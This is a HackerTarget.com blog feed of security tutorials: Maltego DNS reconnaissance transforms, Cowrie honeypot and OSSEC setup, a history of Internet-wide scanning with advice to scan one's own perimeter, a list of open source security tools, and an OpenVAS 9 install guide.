Tools – HackerTarget.com https://hackertarget.com Security Vulnerability Scanners and Assessments Fri, 20 Apr 2018 04:37:29 +0000 en-US hourly 1 https://wordpress.org/?v=4.9.5 Maltego Transforms https://hackertarget.com/maltego-transforms/ Fri, 30 Mar 2018 01:49:32 +0000 https://hackertarget.com/?p=10036 Creating Local Maltego Transforms for our DNS reconnaissance tools has been on my to do list for a while now. I am happy to say they are now available and it is a sweet way to perform infrastructure mapping from a domain. What is Maltego? Maltego is a cross platform application, for performing link analysis. […]

The post Maltego Transforms appeared first on HackerTarget.com.

]]>
Creating Local Maltego Transforms for our DNS reconnaissance tools has been on my to do list for a while now. I am happy to say they are now available and it is a sweet way to perform infrastructure mapping from a domain.

What is Maltego?

Maltego is a cross platform application, for performing link analysis. Discover relationships between entities and build a visual representation of different data with a graph based layout. A transform is a process that pulls new data related to the entity, automatically extending the graph.

Maltego is commonly used for reconnaissance in penetration testing engagements and open source intelligence analysis. It is possible to understand the relationship between infrastructure, services and even users when mapping an organisations attack surface.

Using a Local Maltego Transform

There are two types of Transforms within Maltego, one runs on servers remotely the other can run locally on the system running Maltego. Of course as is the case with the Hacker Target Transforms while it runs locally the data is pulled remotely from the Hacker Target API.

Installing the Hacker Target Maltego Transforms

To run the transform you will need to have python installed along with the requests module for retrieving the data over a HTTP request. I have not tested on Windows, only on Linux but it should work on all platforms.

The installation is straight forward. Clone (or download) the git repository. Place the files in a local directory, and add the Transforms to your Maltego installation. Either manually or by using the mtz file (Maltego Configuration File).

Head over to our GitHub page to grab the necessary files and see the detailed installation instructions.

API Quota

With no API key set, you are limited by the number of requests you can perform each day. With a HackerTarget.com Membership this number can be increased. If you have a membership remember to add your API key to the three transform files.

What data is available

Currently there are three transforms available. All based on host name enumeration, for the express purpose of discovering the attack surface of a target organisation.

  • GetHostNames.py - search against a domain and pull known subdomains
  • GetReverseIP.py - search against an IP address and retrieve other host records pointing to that IP
  • GetSharedDNS.py - search against a NS and get host records that are pointing to this NS server

Obviously this can be a circular process, as new hosts are discovered resolve these to IP address, and perform the reverse IP search. As new domains are discovered search against these with the host name search.

Sounds great but what does it looks like?

Click for Demo

Have Fun

Maltego is a fun way to explore targets. Whether you are penetration testing, running down bug bounties, researching an organisations infrastructure or simply curious you can get a lot of value from even the community version of Maltego (CE) and our Free access to the API.

The post Maltego Transforms appeared first on HackerTarget.com.

]]>
Cowrie Honeypot on Ubuntu https://hackertarget.com/cowrie-honeypot-ubuntu/ Tue, 20 Mar 2018 00:28:21 +0000 https://hackertarget.com/?p=9891 Cowrie is the new fork of the Kippo Honeypot. It has been updated with new features and provides emulation that records the session of an attacker. With this session recording you are able to get a better understanding of the attackers tools, tactics and procedures (TTPs). A term that is increasing being used in Cyber […]

The post Cowrie Honeypot on Ubuntu appeared first on HackerTarget.com.

]]>
Cowrie is the new fork of the Kippo Honeypot. It has been updated with new features and provides emulation that records the session of an attacker. With this session recording you are able to get a better understanding of the attackers tools, tactics and procedures (TTPs). A term that is increasing being used in Cyber Defence and Incident Response.

Our setup will be very close to a default installation of Cowrie. The hosts SSH daemon will run on a high port (22222), Cowrie will run on 2222 and port 22 (default SSH) will be redirected to 2222 using iptables. So the SSH bot or attacker will connect to port 22 be redirected to our honeypot on 2222. Confused? Take a look at the diagram.

A warning before we proceed. Honeypots are designed to allow access to a system by an attacker. This could result in compromise of the host if the honeypot has vulnerabilities or is mis-configured. Understand what you are doing and be very careful if running a honeypot anywhere near production kit.

Change Default SSH Port

Before installing cowrie and our dependencies lets move SSH to port 22222.

 root@cowrie:~# vi /etc/ssh/sshd_config
# What ports, IPs and protocols we listen for
Port 22222

root@cowrie1:~# systemctl restart ssh
root@cowrie1:~# systemctl status ssh
? ssh.service - OpenBSD Secure Shell server
   Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: enabled)
   Active: active (running) since Mon 2018-03-19 23:21:05 UTC; 5s ago
 Main PID: 9242 (sshd)
    Tasks: 1
   Memory: 1.3M
      CPU: 5ms
   CGroup: /system.slice/ssh.service
           ??9242 /usr/sbin/sshd -D

Mar 19 23:21:05 cowrie1 systemd[1]: Stopped OpenBSD Secure Shell server.
Mar 19 23:21:05 cowrie1 systemd[1]: Starting OpenBSD Secure Shell server...
Mar 19 23:21:05 cowrie1 sshd[9242]: Server listening on 0.0.0.0 port 22222.
Mar 19 23:21:05 cowrie1 sshd[9242]: Server listening on :: port 22222.
Mar 19 23:21:05 cowrie1 systemd[1]: Started OpenBSD Secure Shell server.

root@cowrie1:~# netstat -nap | grep 2222
tcp        0      0 0.0.0.0:22222            0.0.0.0:*               LISTEN      9242/sshd
tcp6       0      0 :::22222                 :::*                    LISTEN      9242/sshd

We can see SSH is now listening on port 22222 from both the systemctl status as well as the netstat output.

Installation of Cowrie Honeypot on Ubuntu

Firstly we will run apt udpate as we are on a brand new Digital Ocean VPS. Then we will install dependencies and create a Cowrie user. Running a Honeypot as root would be a bad idea.

 root@cowrie:~# apt update
root@cowrie:~# apt-get install git python-virtualenv libssl-dev libffi-dev build-essential libpython-dev python2.7-minimal authbind
root@cowrie:~# adduser --disabled-password cowrie
Adding user `cowrie' ...
Adding new group `cowrie' (1000) ...
Adding new user `cowrie' (1000) with group `cowrie' ...
Creating home directory `/home/cowrie' ...
Copying files from `/etc/skel' ...
Changing the user information for cowrie
Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [Y/n] Y
root@cowrie1:~# su - cowrie
cowrie@cowrie1:~$

Ok, now lets grab the code for Cowrie using git.

cowrie@cowrie1:~$ git clone http://github.com/micheloosterhof/cowrie
Cloning into 'cowrie'...
remote: Counting objects: 9340, done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 9340 (delta 3), reused 2 (delta 0), pack-reused 9330
Receiving objects: 100% (9340/9340), 7.43 MiB | 2.32 MiB/s, done.
Resolving deltas: 100% (6415/6415), done.
Checking connectivity... done.
cowrie@cowrie1:~$

Now we will create a virtual environment for Python and Cowrie to run from:

cowrie@cowrie1:~$ cd cowrie
cowrie@cowrie:~/cowrie$ virtualenv cowrie-env
Running virtualenv with interpreter /usr/bin/python2
New python executable in /home/cowrie/cowrie/cowrie-env/bin/python2
Also creating executable in /home/cowrie/cowrie/cowrie-env/bin/python
Installing setuptools, pkg_resources, pip, wheel...done.
cowrie@cowrie1:~$

Next step is to activate the Python virtual environment and install the python packages that Cowrie needs to run.

cowrie@cowrie1:~/cowrie$ source cowrie-env/bin/activate                                                                             
(cowrie-env) cowrie@cowrie1:~/cowrie$ pip install --upgrade pip                                                                     
Requirement already up-to-date: pip in ./cowrie-env/lib/python2.7/site-packages                                                     
(cowrie-env) cowrie@cowrie1:~/cowrie$ pip install --upgrade -r requirements.txt                                                     
Collecting twisted>=17.1.0 (from -r requirements.txt (line 1))                                                                      
  Downloading Twisted-17.9.0.tar.bz2 (3.0MB)                                                                                        
    100% |????????????????????????????????| 3.0MB 403kB/s                                                                           
Collecting cryptography>=0.9.1 (from -r requirements.txt (line 2))                                                                  
  Downloading cryptography-2.2-cp27-cp27mu-manylinux1_x86_64.whl (2.2MB)                                                            
    100% |????????????????????????????????| 2.2MB 544kB/s                                                                           
Collecting configparser (from -r requirements.txt (line 3))                                                                         
  Downloading configparser-3.5.0.tar.gz                                                                                             
Collecting pyopenssl (from -r requirements.txt (line 4))                                                                            
  Downloading pyOpenSSL-17.5.0-py2.py3-none-any.whl (53kB)                                                                          
    100% |????????????????????????????????| 61kB 9.8MB/s                                                                            
Collecting pyparsing (from -r requirements.txt (line 5))                                                                            
  Downloading pyparsing-2.2.0-py2.py3-none-any.whl (56kB)                                                                           
    100% |????????????????????????????????| 61kB 9.7MB/s                                                                            
Collecting packaging (from -r requirements.txt (line 6))                                                                            
  Downloading packaging-17.1-py2.py3-none-any.whl                                                                                   
Collecting appdirs>=1.4.0 (from -r requirements.txt (line 7))                                                                       
  Downloading appdirs-1.4.3-py2.py3-none-any.whl                                                                                    
Collecting pyasn1_modules (from -r requirements.txt (line 8))                                                                       
  Downloading pyasn1_modules-0.2.1-py2.py3-none-any.whl (60kB)                                                                      
    100% |????????????????????????????????| 61kB 9.7MB/s                                                                            
Collecting attrs (from -r requirements.txt (line 9))
  Downloading attrs-17.4.0-py2.py3-none-any.whl
Collecting service_identity (from -r requirements.txt (line 10))
  Downloading service_identity-17.0.0-py2.py3-none-any.whl
Collecting python-dateutil (from -r requirements.txt (line 11))
  Downloading python_dateutil-2.7.0-py2.py3-none-any.whl (207kB)
    100% |????????????????????????????????| 215kB 5.4MB/s
Collecting tftpy (from -r requirements.txt (line 12))
  Downloading tftpy-0.6.2.tar.gz
Collecting zope.interface>=3.6.0 (from twisted>=17.1.0->-r requirements.txt (line 1))
  Downloading zope.interface-4.4.3-cp27-cp27mu-manylinux1_x86_64.whl (170kB)
    100% |????????????????????????????????| 174kB 4.1MB/s
Collecting constantly>=15.1 (from twisted>=17.1.0->-r requirements.txt (line 1))
  Downloading constantly-15.1.0-py2.py3-none-any.whl
Collecting incremental>=16.10.1 (from twisted>=17.1.0->-r requirements.txt (line 1))
  Downloading incremental-17.5.0-py2.py3-none-any.whl
Collecting Automat>=0.3.0 (from twisted>=17.1.0->-r requirements.txt (line 1))
  Downloading Automat-0.6.0-py2.py3-none-any.whl
Collecting hyperlink>=17.1.1 (from twisted>=17.1.0->-r requirements.txt (line 1))
  Downloading hyperlink-18.0.0-py2.py3-none-any.whl
Collecting cffi>=1.7; platform_python_implementation != "PyPy" (from cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading cffi-1.11.5-cp27-cp27mu-manylinux1_x86_64.whl (407kB)
    100% |????????????????????????????????| 409kB 3.0MB/s
Collecting enum34; python_version < "3" (from cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading enum34-1.1.6-py2-none-any.whl
Collecting asn1crypto>=0.21.0 (from cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading asn1crypto-0.24.0-py2.py3-none-any.whl (101kB)
    100% |????????????????????????????????| 102kB 9.7MB/s
Collecting idna>=2.1 (from cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading idna-2.6-py2.py3-none-any.whl (56kB)
    100% |????????????????????????????????| 61kB 9.5MB/s
Collecting six>=1.4.1 (from cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading six-1.11.0-py2.py3-none-any.whl
Collecting ipaddress; python_version < "3" (from cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading ipaddress-1.0.19.tar.gz
Collecting pyasn1<0.5.0,>=0.4.1 (from pyasn1_modules->-r requirements.txt (line 8))
  Downloading pyasn1-0.4.2-py2.py3-none-any.whl (71kB)
    100% |????????????????????????????????| 71kB 9.4MB/s
Requirement already up-to-date: setuptools in ./cowrie-env/lib/python2.7/site-packages (from zope.interface>=3.6.0->twisted>=17.1.0->-r requirements.txt (line 1))
Collecting pycparser (from cffi>=1.7; platform_python_implementation != "PyPy"->cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading pycparser-2.18.tar.gz (245kB)
    100% |????????????????????????????????| 256kB 4.5MB/s
Building wheels for collected packages: twisted, configparser, tftpy, ipaddress, pycparser
  Running setup.py bdist_wheel for twisted ... done
  Stored in directory: /home/cowrie/.cache/pip/wheels/91/c7/95/0bb4d45bc4ed91375013e9b5f211ac3ebf4138d8858f84abbc
  Running setup.py bdist_wheel for configparser ... done
  Stored in directory: /home/cowrie/.cache/pip/wheels/1c/bd/b4/277af3f6c40645661b4cd1c21df26aca0f2e1e9714a1d4cda8
  Running setup.py bdist_wheel for tftpy ... done
  Stored in directory: /home/cowrie/.cache/pip/wheels/b6/6b/9a/4536837177d943f2aede676c74488f1dd6f2c3c7ef80f8c094
  Running setup.py bdist_wheel for ipaddress ... done
  Stored in directory: /home/cowrie/.cache/pip/wheels/d7/6b/69/666188e8101897abb2e115d408d139a372bdf6bfa7abb5aef5
  Running setup.py bdist_wheel for pycparser ... done
  Stored in directory: /home/cowrie/.cache/pip/wheels/95/14/9a/5e7b9024459d2a6600aaa64e0ba485325aff7a9ac7489db1b6
Successfully built twisted configparser tftpy ipaddress pycparser
Installing collected packages: zope.interface, constantly, incremental, attrs, six, Automat, idna, hyperlink, twisted, pycparser, cffi, enum34, asn1crypto, ipaddress, cryptography, configparser, pyopenssl, pyparsing, packaging, appdirs, pyasn1, pyasn1-modules, service-identity, python-dateutil, tftpy
Successfully installed Automat-0.6.0 appdirs-1.4.3 asn1crypto-0.24.0 attrs-17.4.0 cffi-1.11.5 configparser-3.5.0 constantly-15.1.0 cryptography-2.2 enum34-1.1.6 hyperlink-18.0.0 idna-2.6 incremental-17.5.0 ipaddress-1.0.19 packaging-17.1 pyasn1-0.4.2 pyasn1-modules-0.2.1 pycparser-2.18 pyopenssl-17.5.0 pyparsing-2.2.0 python-dateutil-2.7.0 service-identity-17.0.0 six-1.11.0 tftpy-0.6.2 twisted-17.9.0 zope.interface-4.4.3

Ok, thats the initial setup out of the way. Now we need to configure the Cowrie daemon and get started.

cp cowrie.cfg.dist cowrie.cfg

This creates a config file that we can edit and it won't be overwritten by updates.

Editing the configuration file we will make a few changes from the defaults. Firstly I will change the hostname seen by a successul login by an attacker, keep it generic and non obvious. Use vim or your favorite text editor to make these changes.

# Hostname for the honeypot. Displayed by the shell prompt of the virtual
# environment
#
# (default: svr04)
hostname = testserver5

The second change I will make is to enable telnet. SSH is enabled by default.

# Enable Telnet support, disabled by default
enabled = true

As you can see in the configuration there are many options and things to play with, from logging and alerting to fake addresses and file downloads.

Finally we are ready to start the daemon.

cowrie@cowrie:~/cowrie$ bin/cowrie start                                             
Using default Python virtual environment "/home/cowrie/cowrie/cowrie-env"             
Starting cowrie: [twistd   --umask 0022 --pidfile var/run/cowrie.pid --logger cowrie.python.logfile.logger cowrie ]...

cowrie@cowrie:~/cowrie$ netstat -an                  
Active Internet connections (servers and established)                                 
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2223            0.0.0.0:*               LISTEN

From the netstat we can see the SSH and Telnet daemons of our honeypot listening on 2222 and 2223 respectively.

Last step is to redirect traffic to 22 and 23 to the high ports 2222 and 2223 using iptables.

root@cowrie:~# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222                                          
root@cowrie:~# iptables -t nat -A PREROUTING -p tcp --dport 23 -j REDIRECT --to-port 2223   

Now it is just a waiting game. However, due to the amount of SSH scanning that takes place on the Internet you will not have to wait long.

cowrie@cowrie:~/cowrie$ tail -f log/cowrie.log

Within 5 minutes I could see SSH connections logging in and running commands within my Honeypot.

The post Cowrie Honeypot on Ubuntu appeared first on HackerTarget.com.

]]>
OSSEC Introduction and Installation Guide https://hackertarget.com/ossec-introduction-and-installation-guide/ Sat, 17 Mar 2018 08:20:53 +0000 http://hackertarget.com/?p=355 OSSEC is a Host Based Intrusion Detection and Prevention system. Best practice security management calls for a layered approach to security; security vulnerability scanning, a firewall, strong passwords, patch management and intrusion detection capabilities are all important layers. Using a HIDS allows you to have real time visibility into what security events are taking place […]

The post OSSEC Introduction and Installation Guide appeared first on HackerTarget.com.

]]>
OSSEC is a Host Based Intrusion Detection and Prevention system.

Best practice security management calls for a layered approach to security; security vulnerability scanning, a firewall, strong passwords, patch management and intrusion detection capabilities are all important layers. Using a HIDS allows you to have real time visibility into what security events are taking place on a server.

The latest version of OSSEC is easy to use and provides a high level of system surveillance for a small amount of effort.

OSSEC provides a number of functions:

  • Real time log monitoring
  • File integrity checking - detects changes to files and system paths
  • Rootkit detection
  • Changes to the system / running services (netstat) / disk space / password file changes
  • Real time blocking of detected attacks through firewall rule modification
  • Execute arbitrary commands based on specific events

At the most basic level you can install OSSEC, set an email address and let it do its job alerting you to security related events on your server. It will not impact the system in anyway simply provide you with security related visibility.

Tuning is easy and you will likely only need to tune out a few things to reduce the amount of alerts you receive as the rate of false positives is very low.

Full installation instructions are available here https://ossec.github.io/docs/manual/installation/install-source.html

While the following information is for an older version, nothing has changed in the process of the latest version. Download the tar archive from the ossec site and get started.

Updated March 2018 to include the latest version of OSSEC. Our original OSSEC installation guide was released in 2009. It is still a favourite open source security tool, that does what it is supposed do really well.

A quick guide to installing on Ubuntu follows:

wget https://github.com/ossec/ossec-hids/archive/2.9.3.tar.gz

tar zxvf 2.9.3.tar.gz
cd ossec-hids-2.9.3
sudo ./install.sh


1. What kind of installation do you want (server, agent, local or help)?

* If you are doing a basic install to a single server select 'local'.
This creates a single install to monitor only the server you are
installing on. See the documentation on the site for details on
setting up multiple agents on a number of servers that all report back
to a server.

2- Setting up the installation environment.

 - Choose where to install the OSSEC HIDS [/var/ossec]:

   - Installation will be made at  /var/ossec .

3- Configuring the OSSEC HIDS.

 3.1- Do you want e-mail notification? (y/n) [y]:
  - What's your e-mail address?   -- enter your email address here

 - We found your SMTP server as: example.test.com.
  - Do you want to use it? (y/n) [y]: n

  - What's your SMTP server ip/host? enter your preffered smtp server here

 3.2- Do you want to run the integrity check daemon? (y/n) [y]:
   (this is for file integrity checking, alerts you to changes to
files on your system)

  - Running syscheck (integrity check daemon).

 3.3- Do you want to run the rootkit detection engine? (y/n) [y]:
  (this checks for rootkits on a regular basis)

  - Running rootcheck (rootkit detection).

 3.4- Active response allows you to execute a specific
      command based on the events received. For example,
      you can block an IP address or disable access for
      a specific user.
      More information at:
      http://www.ossec.net/en/manual.html#active-response

  - Do you want to enable active response? (y/n) [y]:
(this can block attacks that meet certain rules)

If you select yes for Active response you are adding Intrusion Prevention capability, this is a good thing but keep in mind it is a good idea to white list your own IP's as you don't want active response to trigger against your IP and auto block your access. This could happen if you failed multiple ssh logins, or if you were to run a
vulnerability scan against your IP - as ossec would detect this as an attack. So your IP would get blocked, and then you would be unable to ssh to your server for example to manage it!

After compiling is complete you will be presented with final instructions:

- System is Debian (Ubuntu or derivative).
 - Init script modified to start OSSEC HIDS during boot.

 - Configuration finished properly.

 - To start OSSEC HIDS:
               /var/ossec/bin/ossec-control start

 - To stop OSSEC HIDS:
               /var/ossec/bin/ossec-control stop

 - The configuration can be viewed or modified at /var/ossec/etc/ossec.conf


   Thanks for using the OSSEC HIDS.
   If you have any question, suggestion or if you find any bug,
   contact us at contact@ossec.net or using our public maillist at
   ossec-list@ossec.net
   ( http://www.ossec.net/main/support/ ).

   More information can be found at http://www.ossec.net

   ---  Press ENTER to finish (maybe more information below). ---

That's it your done. Just start it up with:

       /var/ossec/bin/ossec-control start

After your initial install you will get a number of alerts (assuming your smtp is configured correctly). Agent starting up, new user logged in and that sort of thing.

So for 15 minutes work you now have real time security monitoring of your server, if you would like to test active response try our online vulnerability scans and test your hosts defence.

If you active response enabled vulnerability scanners will likely get blocked and the scan will not be completed. To run a full scan against your system with active response enabled try adding the scanning host to the OSSEC white-list (preferred) or disable ossec for the duration of the scan (not recommended), make sure you re-enable your protection after the scan completes.

The post OSSEC Introduction and Installation Guide appeared first on HackerTarget.com.

]]>
Internet Wide Scanning – Remote access granted https://hackertarget.com/remote-access-granted/ Sun, 26 Nov 2017 12:41:34 +0000 http://hackertarget.com/?p=5479 In the beginning there were Google Dorks, by using specific Google search queries it is still possible to find thousands of unsecured remotely accessible security cameras and printers. Now with search engines such as Shodan.io and Censys.io finding open devices on the Internet has gone to the next level. Google dorks work because Google happened […]

The post Internet Wide Scanning – Remote access granted appeared first on HackerTarget.com.

]]>
In the beginning there were Google Dorks, by using specific Google search queries it is still possible to find thousands of unsecured remotely accessible security cameras and printers. Now with search engines such as Shodan.io and Censys.io finding open devices on the Internet has gone to the next level.

Google dorks work because Google happened to index the admin login screen of the device. Since the majority of devices still had the default credentials it was then possible to view security cameras in offices around the world, print random junk to unknown printers and much more. While pranks and much laughing may follow, Google dorks highlight the importance of security awareness. That is understanding what services are listening on your perimeter and changing default credentials.

The folowing techniques for finding insecure devices connected to the Internet are much more accurate, comprehensive and accessible.

Shodan the Google of network services

Things started to heat up when John Matherly released the Shodan Search Tool. In 2009 John started indexing Internet service banners across the net and made the data available at ShodanHQ. It is now commonly known as the Google of network services, and has made numerous appearances in mainstream media such as CNN and Forbes.

Internet Census 2012

2012 saw the release of the Internet Census, an unknown researcher created a botnet that scanned the entire IPv4 address space - he or she then published the results online. Note that this project was audacious and very much illegal due to the fact that it utilized exploited routers in order to perform the port scanning.

Zmap and Masscan

Zmap was released a few months later by a team of computer scientists at the University of Michigan. The Zmap port scanning tool can scan the entire Internet in 45 minutes (IPv4 address space). You will need a big fat uplink and a fast network card but that is pretty damn quick. Yet another extremely fast port scanner was released soon after known as Masscan.

Project Sonar

Project Sonar was the next big project in the timeline launched by HDMoore of Metasploit fame. At Scans.io the results of Internet scanning from HDMoore's critical.io scanning project, and datasets from the Zmap project have been made available on line for researchers to explore.

Censys

Censys was created in 2015 at the University of Michigan, by the security researchers who developed ZMap. A very fast port scanner capable of Internet-wide scanning. The team has been scanning the Internet and making the results available through the portal. They have recently launched commercial access to the API.

VNC pwnage

Most recently a security researcher has scanned a specific TCP port across the IPv4 address space and taken a screenshot of VNC (remote control software) services that have no password. In 16 minutes he found 30000 systems with no password, and some of those systems included 2 hydroelectric plants and surveillance cameras at a casino in the Czech Republic.

Now go Port Scan your Internet facing networks

As seen from the projects, data and articles linked above, all too often networks go untested for services that should not be there or at least not be accessible from anywhere in the world over the Internet.

Here are three steps that will help you stay secure and it might even just make the world a safer place:

Port Scan your Internet facing IP addresses with Nmap

  • Nmap is simply the best tool for performing a port scan. You can download Nmap and install it on your operating system of choice.
  • Keep in mind that you want to perform the testing from an external IP address to the network you are testing.
  • Know your network ranges, keep a list of all IP ranges and systems you manage. Ensure all networks and systems are tested.
Firewall, block or restrict access to services that should not be accessible from the Internet

  • Make the necessary changes and get it fixed.
  • Implement a change control process for firewall changes and systems on the perimeter.
Schedule the port scan to be performed on a regular basis

  • Select a schedule based on your risk model, perhaps weekly, daily or monthly.
  • Changes to the network occur all the time; when new devices are added; changes are made to existing devices; firewall rules are modified; when a change occurs mistakes will happen.
  • Nmap has a tool called ndiff that allows you to compare two port scans, this is handy tool for scripting regular port scans from a VPS or off site location.

Regular port scans are simple to implement and can be incorporated with other regular security tasks. Start now before someone on the other side of the world starts abusing your printer or turns up the heat in your building.

The post Internet Wide Scanning – Remote access granted appeared first on HackerTarget.com.

]]> 15 Essential Open Source Security Tools https://hackertarget.com/10-open-source-security-tools/ Wed, 27 Sep 2017 11:30:15 +0000 http://hackertarget.com/?p=3793 There are thousands of open source security tools with both defensive and offensive security capabilities.  Updated in 2017 to include an additional 5 essential security tools. The following are 10 15 essential security tools that will help you to secure your systems and networks. These open source security tools have been given the essential rating […]

The post 15 Essential Open Source Security Tools appeared first on HackerTarget.com.

]]>
There are thousands of open source security tools with both defensive and offensive security capabilities.

 Updated in 2017 to include an additional 5 essential security tools.

The following are 10 15 essential security tools that will help you to secure your systems and networks. These open source security tools have been given the essential rating due to the fact that they are effective, well supported and easy to start getting value from.

1. Nmap - map your network and ports with the number one port scanning tool. Nmap now features powerful NSE scripts that can detect vulnerabilities, misconfiguration and security related information around network services. After you have nmap installed be sure to look at the features of the included ncat - its netcat on steroids.

2. OpenVAS - open source vulnerability scanning suite that grew from a fork of the Nessus engine when it went commercial. Manage all aspects of a security vulnerability management system from web based dashboards. For a fast and easy external scan with OpenVAS try our online OpenVAS scanner.

3. OSSEC - host based intrusion detection system or HIDS, easy to setup and configure. OSSEC has far reaching benefits for both security and operations staff.

4. Security Onion - a network security monitoring distribution that can replace expensive commercial grey boxes with blinking lights. Security Onion is easy to setup and configure. With minimal effort you will start to detect security related events on your network. Detect everything from brute force scanning kids to those nasty APT's.

5. Metasploit Framework - test all aspects of your security with an offensive focus. Primarily a penetration testing tool, Metasploit has modules that not only include exploits but also scanning and auditing.

6. OpenSSH - secure all your traffic between two points by tunnelling insecure protocols through an SSH tunnel. Includes scp providing easy access to copy files securely. Can be used as poor mans VPN for Open Wireless Access points (airports, coffee shops). Tunnel back through your home computer and the traffic is then secured in transit. Access internal network services through SSH tunnels using only one point of access. From Windows, you will probably want to have putty as a client and winscp for copying files. Under Linux just use the command line ssh and scp.

7. Wireshark - view traffic in as much detail as you want. Use Wireshark to follow network streams and find problems. Tcpdump and Tshark are command line alternatives. Wireshark runs on Windows, Linux, FreeBSD or OSX based systems.

8. Kali Linux was built from the foundation of BackTrack Linux. Kali is a security testing Linux distribution based on Debian. It comes prepackaged with hundreds of powerful security testing tools. From Airodump-ng with wireless injection drivers to Metasploit this bundle saves security testers a great deal of time configuring tools.

9. Nikto - a web server testing tool that has been kicking around for over 10 years. Nikto is great for firing at a web server to find known vulnerable scripts, configuration mistakes and related security problems. It won't find your XSS and SQL web application bugs, but it does find many things that other tools miss. To get started try the Nikto Tutorial or the online hosted version.

10. Trucecrypt As of 2014, the TrueCrypt product is no longer being maintained. Two new security tools, CipherShed and VeraCrypt were forked and have been through extensive security audits.

Updated 2017 to include another 5 high quality open source security tools. These additional projects are all very much focused on the defenders side. With in depth traffic analysis, intrusion detection and incident response all covered. Interesting to see sponsors of these projects include Facebook, Cisco and Google.

11. Moloch is packet capture analysis ninja style. Powered by an elastic search backend this makes searching through pcaps fast. Has great support for protocol decoding and display of captured data. With a security focus this is an essential tool for anyone interested in traffic analysis.

12. Bro IDS totes itself as more than an Intrusion Detection System, and it is hard to argue with this statement. The IDS component is powerful, but rather than focusing on signatures as seen in traditional IDS systems. This tool decodes protocols and looks for anomalies within the traffic.

13. Snort is a real time traffic analysis and packet logging tool. It can be thought of as a traditional IDS, with detection performed by matching signatures. The project is now managed by Cisco who use the technology in its range of SourceFire appliances. An alternative project is the Suricata system that is a fork of the original Snort source.

14. OSQuery monitors a host for changes and is built to be performant from the ground up. This project is cross platform and was started by the Facebook Security Team. It is a powerful agent that can be run on all your systems (Windows, Linux or OSX) providing detailed visibility into anomalies and security related events.

15. GRR - Google Rapid Response a tool developed by Google for security incident response. This python agent / server combination allows incident response to be performed against a target system remotely.

Find Holes in Your Defence
Hosted open source security testing.

The post 15 Essential Open Source Security Tools appeared first on HackerTarget.com.

]]>
OpenVAS 9 install on Ubuntu 16.04 https://hackertarget.com/openvas-9-install-ubuntu-1604/ Sat, 20 May 2017 10:54:44 +0000 https://hackertarget.com/?p=8943 If you are installing OpenVAS into an Ubuntu virtual machine I suggest adding as much CPU as you can as this will speed up your scan times. A suggested minimum is 8GB of RAM and 4 cores. An interesting new feature mentioned in the latest release is the development towards build a distributed system for […]

The post OpenVAS 9 install on Ubuntu 16.04 appeared first on HackerTarget.com.

]]>

To install OpenVAS 9 on Ubuntu 16.04 we will use the third party binary package method. While we could build from source the packages allow us to get OpenVAS up and running quickly and with minimal fuss.

For on going management and troubleshooting tips check out the OpenVAS Tutorial.

OpenVAS installation

If you are installing OpenVAS into an Ubuntu virtual machine I suggest adding as much CPU as you can as this will speed up your scan times. A suggested minimum is 8GB of RAM and 4 cores. An interesting new feature mentioned in the latest release is the development towards build a distributed system for large scale deployments. Having a central console (and manager) that can delegate scans to multiple scanners is an excellent architecture for those wanting to scan large numbers of targets.

Install OpenVAS

First step is to add the PPA repository to our Ubuntu build. In this example I am using a clean server build on VMware Workstation. After running the app-apt-repository command you will receive a notice that gives a good summary of the installation process.

root@ubuntu:~# add-apt-repository ppa:mrazavi/openvas

Next apt update and install the main packages.

root@ubuntu:~# apt update
root@ubuntu:~# apt install sqlite3
root@ubuntu:~# apt install openvas9

There are a ton of packages to be installed, on my clean Ubuntu Server build a total of 175 packages and 581mb of disk space is to be used. A couple of additional packages are required for the PDF reports to work.

root@ubuntu:~# apt install texlive-latex-extra --no-install-recommends

Now some extra fonts to make those pdf's look pretty.

root@ubuntu:~# apt-get install texlive-fonts-recommended

The libopenvas9-dev package installs the openvas-nasl utility that allows you to run single OpenVAS nasl scripts, great for quick checks and troubleshooting. In the next step we are also adding the vulnerability data by syncing with the feeds.

root@ubuntu:~# apt install libopenvas9-dev
root@ubuntu:~# greenbone-nvt-sync
root@ubuntu:~# greenbone-scapdata-sync
root@ubuntu:~# greenbone-certdata-sync

Time to start the OpenVAS scanner process.

root@ubuntu:~# service openvas-scanner restart

Now a check of the running processes will show our scanner loading the NVT's.

root@ubuntu:~# ps -ef | grep openvas
root      34149      1  0 00:22 ?        00:00:00 gpg-agent --homedir /var/lib/openvas/openvasmd/gnupg --use-standard-socket --daemon
root      34241      1  0 00:22 ?        00:00:01 openvasmd
root      37861      1 55 02:01 ?        00:00:02 openvassd: Reloaded 8550 of 53269 NVTs (16% / ETA: 00:20)
root      37862  37861  0 02:01 ?        00:00:00 openvassd (Loading Handler)
root      37864  25921  0 02:01 pts/1    00:00:00 grep --color=auto openvas

Using netstat -an we can see that gsad is now running on port 4000. Another thing to notice is that openvasmd and openvassd are running on sockets rather listening on TCP ports.

An extra package is required if we want to be able to test Microsoft SMB services for critical vulnerabilities such as MS17-010. This particular Microsoft Patch is of note as it fixes the vulnerability that has been keeping IT staff busy since the wannacry ransomware attack started spreading around the world. Of course any penetration tester will be familiar with MS08-067, a previous favourite vulnerability for attacking Windows 2003 systems.

apt install smbclient

Now lets restart the openvas-manager and rebuild the cache. Rebuilding the cache ensures the feed that we synced is all loaded up into the manager and we are ready to start testing.

root@ubuntu:~# service openvas-manager restart
root@ubuntu:~# openvasmd --rebuild --progress
Rebuilding NVT cache... done.

If you have any issues the log files contain the information for troubleshooting. OpenVAS logs can be found in the following location.

/var/log/openvas
/var/log/openvas/gsad.log
/var/log/openvas/openvasmd.log
/var/log/openvas/openvassd.dump
/var/log/openvas/openvassd.messages

We should be now all ready to load up the web interface and start testing. Don't forget we are on a new port number. The default user and password is admin / admin.

